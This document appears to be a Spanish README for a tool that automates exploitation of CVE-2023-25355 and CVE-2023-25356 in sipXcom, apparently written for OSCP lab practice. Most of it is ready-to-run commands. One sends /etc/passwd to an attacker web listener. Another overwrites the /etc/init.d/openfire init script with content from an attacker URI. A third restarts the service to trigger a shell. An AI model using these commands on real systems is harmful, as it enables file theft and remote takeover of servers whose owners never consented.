
CVE-2023-25355 y CVE-2023-25356 con recarga automática de servicio
El exploit fue encontrado por [email protected] y se presenta en dos piezas increíbles:
Un repositorio para automatizar aún más esta vulnerabilidad ha sido publicado por Alex Linov:
El CVE-2023-25355 es un mecanismo de exfiltración donde los archivos del servidor sipXcom se suben a un servidor web controlado por el atacante.
El CVE-2023-25356 es una extensión de la primera vulnerabilidad donde archivos controlados por el atacante pueden ser escritos en el sistema de archivos del servidor sipXcom. Debido a que el servicio sipXcom puede sobrescribir su propia configuración de inicio, se puede obtener fácilmente una shell tan pronto como se reinicie el servicio.
El punto interesante a destacar aquí es que el usuario superadministrador de sipXcom puede reiniciar este servicio. Por lo tanto, el objetivo de este paquete es automatizar completamente el reinicio de este servicio.
Para preparar el OSCP, hay laboratorios con máquinas que hackear.
En un laboratorio específico, una máquina sujeta a esta vulnerabilidad era/es bastante inestable, lo que significa que a veces tenías que iniciar y revertir el laboratorio varias veces. Esto es molesto. Una vez automatizado, es menos molesto.
Necesitas:
poetry install
Luego puedes ejecutar la herramienta desde el entorno activo, ejecutarla desde el directorio o desde otro lugar con el nombre del CVE:
# si el entorno poetry está activo (poetry shell)
cve_2023_25355 --help
# de lo contrario, desde el directorio actual
poetry run cve_2023_25355 --help
# de lo contrario, desde otro directorio
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
En el siguiente ejemplo, enviamos un payload para exfiltrar el archivo /etc/passwd que se subirá a un listener http controlado.
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
En el siguiente ejemplo, enviamos un payload para sobrescribir el archivo /etc/init.d/openfire con el contenido de la URI proporcionada.
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
Luego, si conocemos la contraseña del superadministrador, podemos reiniciar el servicio para recargar la configuración y activar cualquier gadget.
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
Proyecto: